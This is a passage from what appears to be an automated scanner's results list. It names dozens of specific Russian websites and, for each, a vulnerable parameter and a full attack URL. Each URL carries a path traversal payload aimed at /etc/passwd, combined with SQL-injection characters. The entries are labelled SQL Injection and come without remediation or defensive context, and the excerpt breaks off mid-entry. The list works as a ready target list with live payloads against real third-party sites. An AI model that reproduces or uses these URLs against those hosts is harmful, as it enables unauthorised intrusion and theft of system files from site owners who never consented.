  501. Vulnerability URL: http://it-days.ru/?Page=articles&nid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  502.  
  503.  
  504. Type: SQL Injection
  505. Protocol: http
  506. Verb: get
  507. Parameter: func
  508. Vulnerability URL: http://it.mmcs.rsu.ru/forum?catid=27&func=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  509.  
  510.  
  511. Type: SQL Injection
  512. Protocol: http
  513. Verb: get
  514. Parameter: ch
  515. Vulnerability URL: http://itvonline.ru/index.php?ch=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  516.  
  517.  
  518. Type: SQL Injection
  519. Protocol: http
  520. Verb: get
  521. Parameter: show_aux_page
  522. Vulnerability URL: http://karipazimm.ru/?show_aux_page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  523.  
  524.  
  525. Type: SQL Injection
  526. Protocol: http
  527. Verb: get
  528. Parameter: page
  529. Vulnerability URL: http://karskarton.ru/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  530.  
  531.  
  532. Type: SQL Injection
  533. Protocol: http
  534. Verb: get
  535. Parameter: id
  536. Vulnerability URL: http://la2.war-top.ru/tracker.php?do=in&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  537.  
  538.  
  539. Type: SQL Injection
  540. Protocol: http
  541. Verb: get
  542. Parameter: nr
  543. Vulnerability URL: http://litkreativ.ru/index.php?nr=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&m=works
  544.  
  545.  
  546. Type: SQL Injection
  547. Protocol: http
  548. Verb: get
  549. Parameter: login
  550. Vulnerability URL: http://livefinances.ru/?action=user.public.show&login=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  551.  
  552.  
  553. Type: SQL Injection
  554. Protocol: http
  555. Verb: get
  556. Parameter: cat
  557. Vulnerability URL: http://madcms.ru/?action=all&com=post&cat=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  558.  
  559.  
  560. Type: SQL Injection
  561. Protocol: http
  562. Verb: get
  563. Parameter: com
  564. Vulnerability URL: http://madcms.ru/?action=all&com=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&cat=1
  565.  
  566.  
  567. Type: SQL Injection
  568. Protocol: http
  569. Verb: get
  570. Parameter: id
  571. Vulnerability URL: http://magnitcity.ru/top?do=in&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  572.  
  573.  
  574. Type: SQL Injection
  575. Protocol: http
  576. Verb: get
  577. Parameter: idsec
  578. Vulnerability URL: http://magzem.ru/objects.php?action=result&idsec=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&id=56
  579.  
  580.  
  581. Type: SQL Injection
  582. Protocol: http
  583. Verb: get
  584. Parameter: table
  585. Vulnerability URL: http://mail.eae.ru/bb_archive_vdvi.php?table=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  586.  
  587.  
  588. Type: SQL Injection
  589. Protocol: http
  590. Verb: get
  591. Parameter: show
  592. Vulnerability URL: http://myrate.ru/users.php?type=VIDEO&user=Blaze&show=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  593.  
  594.  
  595. Type: SQL Injection
  596. Protocol: http
  597. Verb: get
  598. Parameter: pid
  599. Vulnerability URL: http://myt-portal.ru/articles.php?pid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  600.  
  601.  
  602. Type: SQL Injection
  603. Protocol: http
  604. Verb: get
  605. Parameter: id
  606. Vulnerability URL: http://najug.ru/hotels.php?is_item=1&mode=catalog&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  607.  
  608.  
  609. Type: SQL Injection
  610. Protocol: http
  611. Verb: get
  612. Parameter: mode
  613. Vulnerability URL: http://najug.ru/hotels.php?is_item=1&mode=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&id=68
  614.  
  615.  
  616. Type: SQL Injection
  617. Protocol: http
  618. Verb: get
  619. Parameter: id_press
  620. Vulnerability URL: http://neuznali.ru/press_details.php?id_press=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  621.  
  622.  
  623. Type: SQL Injection
  624. Protocol: http
  625. Verb: get
  626. Parameter: id
  627. Vulnerability URL: http://o-site.spb.ru/race.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  628.  
  629.  
  630. Type: SQL Injection
  631. Protocol: http
  632. Verb: get
  633. Parameter: category_id
  634. Vulnerability URL: http://ohranki.ru/index.php?category_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&page=catalog
  635.  
  636.  
  637. Type: SQL Injection
  638. Protocol: http
  639. Verb: get
  640. Parameter: id
  641. Vulnerability URL: http://old.uchitel-izd.ru/index.php?task=view&option=content&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  642.  
  643.  
  644. Type: SQL Injection
  645. Protocol: http
  646. Verb: get
  647. Parameter: id
  648. Vulnerability URL: http://online.versa.ru/info.php?type=hotels&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  649.  
  650.  
  651. Type: SQL Injection
  652. Protocol: http
  653. Verb: get
  654. Parameter: baseid
  655. Vulnerability URL: http://partner.1altay.ru/index2.php?task=viewgraph&option=com_orders&baseid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  656.  
  657.  
  658. Type: SQL Injection
  659. Protocol: http
  660. Verb: get
  661. Parameter: id
  662. Vulnerability URL: http://peklamy.ru/text.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  663.  
  664.  
  665. Type: SQL Injection
  666. Protocol: http
  667. Verb: get
  668. Parameter: gallery
  669. Vulnerability URL: http://photo-wallpapers.ru/foto.php?chapter=Goroda&p=7&foto=Goroda385&gallery=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&number=110
  670.  
  671.  
  672. Type: SQL Injection
  673. Protocol: http
  674. Verb: get
  675. Parameter: i
  676. Vulnerability URL: http://printluxe.ru/personal.aspx?i=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  677.  
  678.  
  679. Type: SQL Injection
  680. Protocol: http
  681. Verb: get
  682. Parameter: i
  683. Vulnerability URL: http://printluxe.ru/service.aspx?i=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  684.  
  685.  
  686. Type: SQL Injection
  687. Protocol: http
  688. Verb: get
  689. Parameter: id
  690. Vulnerability URL: http://psor-center.ru/text.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  691.  
  692.  
  693. Type: SQL Injection
  694. Protocol: http
  695. Verb: get
  696. Parameter: item_id
  697. Vulnerability URL: http://radioanten.ru/descr.php?item_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  698.  
  699.  
  700. Type: SQL Injection
  701. Protocol: http
  702. Verb: get
  703. Parameter: id_frm
  704. Vulnerability URL: http://rest.perm.ru/index.php?sub_main=show&id_frm=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  705.  
  706.  
  707. Type: SQL Injection
  708. Protocol: http
  709. Verb: get
  710. Parameter: xn
  711. Vulnerability URL: http://ritchiblackmore.ru/ctlg.php?xn=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  712.  
  713.  
  714. Type: SQL Injection
  715. Protocol: http
  716. Verb: get
  717. Parameter: p
  718. Vulnerability URL: http://shimbukan.spb.ru/?p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  719.  
  720.  
  721. Type: SQL Injection
  722. Protocol: http
  723. Verb: get
  724. Parameter: id
  725. Vulnerability URL: http://shop.doctor-al.ru/inetshop.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  726.  
  727.  
  728. Type: SQL Injection
  729. Protocol: http
  730. Verb: get
  731. Parameter: productID
  732. Vulnerability URL: http://shop.kalyany.ru/index.php?productID=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  733.  
  734.  
  735. Type: SQL Injection
  736. Protocol: http
  737. Verb: get
  738. Parameter: page
  739. Vulnerability URL: http://soprod.ru/?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  740.  
  741.  
  742. Type: SQL Injection
  743. Protocol: http
  744. Verb: get
  745. Parameter: id
  746. Vulnerability URL: http://spectehsnab.ru/index1.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  747.  
  748.  
  749. Type: SQL Injection
  750. Protocol: http
  751. Verb: get
  752. Parameter: p
  753. Vulnerability URL: http://ssj.ael.ru/viewtopic.php?p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  754.  
  755.  
  756. Type: SQL Injection
  757. Protocol: http
  758. Verb: get
  759. Parameter: template
  760. Vulnerability URL: http://store.nomination.ru/showPage.php?id=5&template=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  761.  
  762.  
  763. Type: SQL Injection
  764. Protocol: http
  765. Verb: get
  766. Parameter: level1
  767. Vulnerability URL: http://superbuksir.ru/index.php?level1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  768.  
  769.  
  770. Type: SQL Injection
  771. Protocol: http
  772. Verb: get
  773. Parameter: ref
  774. Vulnerability URL: http://supermouse.ru/index.php?affiliate_banner_id=3&ref=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  775.  
  776.  
  777. Type: SQL Injection
  778. Protocol: http
  779. Verb: get
  780. Parameter: k
  781. Vulnerability URL: http://televizor.webcena.ru/bd-tovar.php?k=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&n=341016369
  782.  
  783.  
  784. Type: SQL Injection
  785. Protocol: http
  786. Verb: get
  787. Parameter: n
  788. Vulnerability URL: http://televizor.webcena.ru/bd-tovar.php?k=759022668&n=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  789.  
  790.  
  791. Type: SQL Injection
  792. Protocol: http
  793. Verb: get
  794. Parameter: id
  795. Vulnerability URL: http://tennis-piter.ru/pageclub.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  796.  
  797.  
  798. Type: SQL Injection
  799. Protocol: http
  800. Verb: get
  801. Parameter: razdelid
  802. Vulnerability URL: http://tfd.ru/index.phtml?articlepage=0&pagetype=index&articleid=0&razdelid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  803.  
  804.  
  805. Type: SQL Injection
  806. Protocol: http
  807. Verb: get
  808. Parameter: cnt
  809. Vulnerability URL: http://tomsk.ecologyandculture.ru/index.php?cnt=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  810.  
  811.  
  812. Type: SQL Injection
  813. Protocol: http
  814. Verb: get
  815. Parameter: id
  816. Vulnerability URL: http://topruchats.ru/index.php?do=in&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  817.  
  818.  
  819. Type: SQL Injection
  820. Protocol: http
  821. Verb: get
  822. Parameter: firm
  823. Vulnerability URL: http://tourfirms.spb.ru/about_r.php?firm=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&rus=1
  824.  
  825.  
  826. Type: SQL Injection
  827. Protocol: http
  828. Verb: get
  829. Parameter: rest_id
  830. Vulnerability URL: http://ufaeda.ru/index.php?rest_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&part_id=113
  831.  
  832.  
  833. Type: SQL Injection
  834. Protocol: http
  835. Verb: get
  836. Parameter: topic
  837. Vulnerability URL: http://velopenza.ru/?topic=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&doc=5&id=2&act=forum
  838.  
  839.  
  840. Type: SQL Injection
  841. Protocol: http
  842. Verb: get
  843. Parameter: id
  844. Vulnerability URL: http://velopenza.ru/?topic=583&doc=5&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&act=forum
  845.  
  846.  
  847. Type: SQL Injection
  848. Protocol: http
  849. Verb: get
  850. Parameter: map
  851. Vulnerability URL: http://veloserver.ru/index.php?menuitem=3&map=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&Route=112&t%5B179%5D=on&t%5B180%5D=on
  852.  
  853.  
  854. Type: SQL Injection
  855. Protocol: http
  856. Verb: get
  857. Parameter: Route
  858. Vulnerability URL: http://veloserver.ru/index.php?menuitem=3&map=17&Route=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&t%5B179%5D=on&t%5B180%5D=on
  859.  
  860.  
  861. Type: SQL Injection
  862. Protocol: http
  863. Verb: get
  864. Parameter: Page
  865. Vulnerability URL: http://vrn-histpage.ru/page.php?Page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  866.  
  867.  
  868. Type: SQL Injection
  869. Protocol: http
  870. Verb: get
  871. Parameter: view
  872. Vulnerability URL: http://vse-aktery.ru/?id_refer=7&view=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  873.  
  874.  
  875. Type: SQL Injection
  876. Protocol: http
  877. Verb: get
  878. Parameter: id_refer
  879. Vulnerability URL: http://vse-aktery.ru/?id_refer=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&view=293
  880.  
  881.  
  882. Type: SQL Injection
  883. Protocol: http
  884. Verb: get
  885. Parameter: id
  886. Vulnerability URL: http://webnachalo.ru/index.php?Itemid=78&lang=ru&task=view&option=com_content&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  887.  
  888.  
  889. Type: SQL Injection
  890. Protocol: http
  891. Verb: get
  892. Parameter: id
  893. Vulnerability URL: http://wmrlinks.ru/text.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  894.  
  895.  
  896. Type: SQL Injection
  897. Protocol: http
  898. Verb: get
  899. Parameter: id
  900. Vulnerability URL: http://wow.war-top.ru/tracker.php?do=in&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  901.  
  902.  
  903. Type: SQL Injection
  904. Protocol: http
  905. Verb: get
  906. Parameter: fid
  907. Vulnerability URL: http://www.41mkad.ru/picture.php?fid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  908.  
  909.  
  910. Type: SQL Injection
  911. Protocol: http
  912. Verb: get
  913. Parameter: m
  914. Vulnerability URL: http://www.a1autospb.ru/?m=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  915.  
  916.  
  917. Type: SQL Injection
  918. Protocol: http
  919. Verb: get
  920. Parameter: id
  921. Vulnerability URL: http://www.advokat-miller.ru/products.phtml?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  922.  
  923.  
  924. Type: SQL Injection
  925. Protocol: http
  926. Verb: get
  927. Parameter: param1
  928. Vulnerability URL: http://www.agidel.ru/?tab=3&param1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  929.  
  930.  
  931. Type: SQL Injection
  932. Protocol: http
  933. Verb: get
  934. Parameter: lang
  935. Vulnerability URL: http://www.akka.ru/?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  936.  
  937.  
  938. Type: SQL Injection
  939. Protocol: http
  940. Verb: get
  941. Parameter: id
  942. Vulnerability URL: http://www.alexclub.ru/index.php?task=view&option=com_content&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  943.  
  944.  
  945. Type: SQL Injection
  946. Protocol: http
  947. Verb: get
  948. Parameter: refer
  949. Vulnerability URL: http://www.all-abc.ru/login.htm?refer=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  950.  
  951.  
  952. Type: SQL Injection
  953. Protocol: http
  954. Verb: get
  955. Parameter: division
  956. Vulnerability URL: http://www.art-billiard.ru/?division=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&id=59
  957.  
  958.  
  959. Type: SQL Injection
  960. Protocol: http
  961. Verb: get
  962. Parameter: num
  963. Vulnerability URL: http://www.artland.ru/pic.php?num=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&id=33
  964.  
  965.  
  966. Type: SQL Injection
  967. Protocol: http
  968. Verb: get
  969. Parameter: cat_num
  970. Vulnerability URL: http://www.atvmarket.ru/select.php?manafactura=Samsung&cat_num=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&group=1&cat=13
  971.  
  972.  
  973. Type: SQL Injection
  974. Protocol: http
  975. Verb: get
  976. Parameter: manafactura
  977. Vulnerability URL: http://www.atvmarket.ru/select.php?manafactura=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&cat_num=13001&group=1&cat=13
  978.  
  979.  
  980. Type: SQL Injection
  981. Protocol: http
  982. Verb: get
  983. Parameter: group
  984. Vulnerability URL: http://www.atvmarket.ru/select.php?manafactura=Samsung&cat_num=13001&group=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&cat=13
  985.  
  986.  
  987. Type: SQL Injection
  988. Protocol: http
  989. Verb: get
  990. Parameter: cat
  991. Vulnerability URL: http://www.atvmarket.ru/select.php?manafactura=Samsung&cat_num=13001&group=1&cat=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  992.  
  993.  
  994. Type: SQL Injection
  995. Protocol: http
  996. Verb: get
  997. Parameter: lang
  998. Vulnerability URL: http://www.auditeureca.ru/index.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  999.  
  1000.  
  1001. Type: SQL Injection
  1002. Protocol: http
  1003. Verb: get
  1004. Parameter: tab
  1005. Vulnerability URL: http://www.auto-krasnodar.ru/firms.php?menu_id=18&nocookie=1&cod=%C7&tab=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1006.  
  1007.  
  1008. Type: SQL Injection
  1009. Protocol: http
  1010. Verb: get
  1011. Parameter: cod
  1012. Vulnerability URL: http://www.auto-krasnodar.ru/firms.php?menu_id=14&cod=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&tab=13
  1013.  
  1014.  
  1015. Type: SQL Injection
  1016. Protocol: http
  1017. Verb: get
  1018. Parameter: id
  1019. Vulnerability URL: http://www.avadiz.ru/production?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&show=lev4
  1020.  
  1021.  
  1022. Type: SQL Injection
  1023. Protocol: http
  1024. Verb: get
  1025. Parameter: page
  1026. Vulnerability URL: http://www.avtostar.ru/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1027.  
  1028.  
  1029. Type: SQL Injection
  1030. Protocol: http
  1031. Verb: get
  1032. Parameter: page
  1033. Vulnerability URL: http://www.balki.ru/index.php?action=content&page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1034.  
  1035.  
  1036. Type: SQL Injection
  1037. Protocol: http
  1038. Verb: get
  1039. Parameter: page_id
